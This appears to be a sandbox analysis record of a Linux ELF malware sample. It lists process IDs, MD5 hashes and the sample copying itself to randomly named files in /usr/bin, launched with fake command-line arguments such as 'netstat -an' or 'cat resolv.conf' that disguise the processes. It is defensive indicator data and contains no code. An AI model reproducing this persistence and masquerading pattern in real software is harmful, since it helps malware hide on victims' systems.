Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5502, Parent PID: 5501

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eoogzzilvp PID: 5502, Parent PID: 5501

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	/usr/bin/eoogzzilvp bash 5434
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eoogzzilvp PID: 5506, Parent PID: 5502

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	-
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5504, Parent PID: 5434

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5505, Parent PID: 5504

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eoogzzilvp PID: 5505, Parent PID: 5504

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	/usr/bin/eoogzzilvp who 5434
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eoogzzilvp PID: 5507, Parent PID: 5505

General

Start time (UTC):	16:16:42
Start date (UTC):	09/04/2024
Path:	/usr/bin/eoogzzilvp
Arguments:	-
File size:	548627 bytes
MD5 hash:	8674fc0a95e5d620aac8fa064a44d827

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5530, Parent PID: 5434

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5531, Parent PID: 5530

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ghgagimgub PID: 5531, Parent PID: 5530

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	/usr/bin/ghgagimgub top 5434
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: ghgagimgub PID: 5532, Parent PID: 5531

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	-
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5533, Parent PID: 5434

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5534, Parent PID: 5533

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ghgagimgub PID: 5534, Parent PID: 5533

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	/usr/bin/ghgagimgub "sleep 1" 5434
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: ghgagimgub PID: 5537, Parent PID: 5534

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	-
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5535, Parent PID: 5434

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5536, Parent PID: 5535

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ghgagimgub PID: 5536, Parent PID: 5535

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	/usr/bin/ghgagimgub id 5434
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: ghgagimgub PID: 5540, Parent PID: 5536

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	-
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5538, Parent PID: 5434

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5539, Parent PID: 5538

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ghgagimgub PID: 5539, Parent PID: 5538

General

Start time (UTC):	16:16:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	/usr/bin/ghgagimgub pwd 5434
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: ghgagimgub PID: 5543, Parent PID: 5539

General

Start time (UTC):	16:16:48
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	-
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5541, Parent PID: 5434

General

Start time (UTC):	16:16:48
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5542, Parent PID: 5541

General

Start time (UTC):	16:16:48
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: ghgagimgub PID: 5542, Parent PID: 5541

General

Start time (UTC):	16:16:48
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	/usr/bin/ghgagimgub top 5434
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: ghgagimgub PID: 5544, Parent PID: 5542

General

Start time (UTC):	16:16:48
Start date (UTC):	09/04/2024
Path:	/usr/bin/ghgagimgub
Arguments:	-
File size:	548627 bytes
MD5 hash:	71b550d02a2581b9bde1f77aaca91265

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5548, Parent PID: 5434

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5549, Parent PID: 5548

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5549, Parent PID: 5548

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	/usr/bin/mqnpjwpasf ifconfig 5434
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5550, Parent PID: 5549

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	-
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5551, Parent PID: 5434

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5552, Parent PID: 5551

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5552, Parent PID: 5551

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	/usr/bin/mqnpjwpasf ifconfig 5434
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5555, Parent PID: 5552

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	-
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5553, Parent PID: 5434

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5554, Parent PID: 5553

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5554, Parent PID: 5553

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	/usr/bin/mqnpjwpasf pwd 5434
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5560, Parent PID: 5554

General

Start time (UTC):	16:16:54
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	-
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5556, Parent PID: 5434

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5557, Parent PID: 5556

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5557, Parent PID: 5556

General

Start time (UTC):	16:16:53
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	/usr/bin/mqnpjwpasf sh 5434
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5561, Parent PID: 5557

General

Start time (UTC):	16:16:54
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	-
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5558, Parent PID: 5434

General

Start time (UTC):	16:16:54
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5559, Parent PID: 5558

General

Start time (UTC):	16:16:54
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5559, Parent PID: 5558

General

Start time (UTC):	16:16:54
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	/usr/bin/mqnpjwpasf "grep \"A\"" 5434
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: mqnpjwpasf PID: 5562, Parent PID: 5559

General

Start time (UTC):	16:16:54
Start date (UTC):	09/04/2024
Path:	/usr/bin/mqnpjwpasf
Arguments:	-
File size:	548627 bytes
MD5 hash:	66f0c34ae54c78c747182ed45c2efb8c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5565, Parent PID: 5434

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5566, Parent PID: 5565

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: exnwncfijy PID: 5566, Parent PID: 5565

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	/usr/bin/exnwncfijy "echo \"find\"" 5434
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: exnwncfijy PID: 5567, Parent PID: 5566

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5568, Parent PID: 5434

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5569, Parent PID: 5568

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: exnwncfijy PID: 5569, Parent PID: 5568

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	/usr/bin/exnwncfijy "cat resolv.conf" 5434
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: exnwncfijy PID: 5572, Parent PID: 5569

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5570, Parent PID: 5434

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5571, Parent PID: 5570

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: exnwncfijy PID: 5571, Parent PID: 5570

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	/usr/bin/exnwncfijy top 5434
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: exnwncfijy PID: 5575, Parent PID: 5571

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5573, Parent PID: 5434

General

Start time (UTC):	16:16:59
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5574, Parent PID: 5573

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: exnwncfijy PID: 5574, Parent PID: 5573

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	/usr/bin/exnwncfijy id 5434
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: exnwncfijy PID: 5578, Parent PID: 5574

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5576, Parent PID: 5434

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5577, Parent PID: 5576

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: exnwncfijy PID: 5577, Parent PID: 5576

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	/usr/bin/exnwncfijy "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: exnwncfijy PID: 5579, Parent PID: 5577

General

Start time (UTC):	16:17:00
Start date (UTC):	09/04/2024
Path:	/usr/bin/exnwncfijy
Arguments:	-
File size:	548627 bytes
MD5 hash:	ea747a0616a82233b50727eb037cf577

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5582, Parent PID: 5434

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5583, Parent PID: 5582

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5583, Parent PID: 5582

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	/usr/bin/xjdcsmwtwe "sleep 1" 5434
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5584, Parent PID: 5583

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	-
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5585, Parent PID: 5434

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5586, Parent PID: 5585

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5586, Parent PID: 5585

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	/usr/bin/xjdcsmwtwe "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5591, Parent PID: 5586

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	-
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5589, Parent PID: 5434

General

Start time (UTC):	16:17:05
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5590, Parent PID: 5589

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5590, Parent PID: 5589

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	/usr/bin/xjdcsmwtwe pwd 5434
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5595, Parent PID: 5590

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	-
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5592, Parent PID: 5434

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5593, Parent PID: 5592

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5593, Parent PID: 5592

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	/usr/bin/xjdcsmwtwe who 5434
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5597, Parent PID: 5593

General

Start time (UTC):	16:17:07
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	-
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5594, Parent PID: 5434

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5596, Parent PID: 5594

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5596, Parent PID: 5594

General

Start time (UTC):	16:17:06
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	/usr/bin/xjdcsmwtwe who 5434
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: xjdcsmwtwe PID: 5598, Parent PID: 5596

General

Start time (UTC):	16:17:07
Start date (UTC):	09/04/2024
Path:	/usr/bin/xjdcsmwtwe
Arguments:	-
File size:	548627 bytes
MD5 hash:	a5d8165af18da100e4fc0b5e182db260

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5601, Parent PID: 5434

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5602, Parent PID: 5601

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: evbjclrakz PID: 5602, Parent PID: 5601

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	/usr/bin/evbjclrakz ls 5434
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: evbjclrakz PID: 5603, Parent PID: 5602

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	-
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5604, Parent PID: 5434

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5605, Parent PID: 5604

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: evbjclrakz PID: 5605, Parent PID: 5604

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	/usr/bin/evbjclrakz ifconfig 5434
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: evbjclrakz PID: 5608, Parent PID: 5605

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	-
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5606, Parent PID: 5434

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5607, Parent PID: 5606

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: evbjclrakz PID: 5607, Parent PID: 5606

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	/usr/bin/evbjclrakz sh 5434
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: evbjclrakz PID: 5611, Parent PID: 5607

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/usr/bin/evbjclrakz
Arguments:	-
File size:	548627 bytes
MD5 hash:	d081c11279702c0cadddc5e2840ded04

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5609, Parent PID: 5434

General

Start time (UTC):	16:17:12
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

